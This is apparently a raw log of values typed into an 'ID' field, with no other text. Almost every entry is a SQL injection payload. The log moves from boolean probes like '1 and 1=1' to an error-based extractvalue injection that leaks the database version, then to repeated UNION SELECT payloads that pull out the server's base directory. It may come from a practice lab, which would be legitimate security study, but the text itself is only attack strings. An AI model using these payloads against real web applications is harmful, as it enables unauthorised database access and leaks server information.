ID:1
ID:1
ID:a
ID:a
ID:1
ID:1and 1
ID:1 and 1=1
ID:1 and 
ID:2
ID:3
ID:3
ID:1
ID:1'  || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1'  || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:-1 UNION select 1,@@basedir,3
ID:-1 UNION select 1,@@basedir,3
ID:-1' UNION select 1,@@basedir,3
ID:-1 UNION select 1,@@basedir,3 #
ID:-1 UNION select 1,@@basedir,3 #
ID:-1 UNION select 1,@@basedir,3 #
ID:-1 UNION select 1,@@basedir,3 #
ID:-1 UNION select 1,@@basedir,3 #
ID:-1 UNION select 1,@@basedir,3 
ID:-1 UNION select 1,@@basedir,3 #
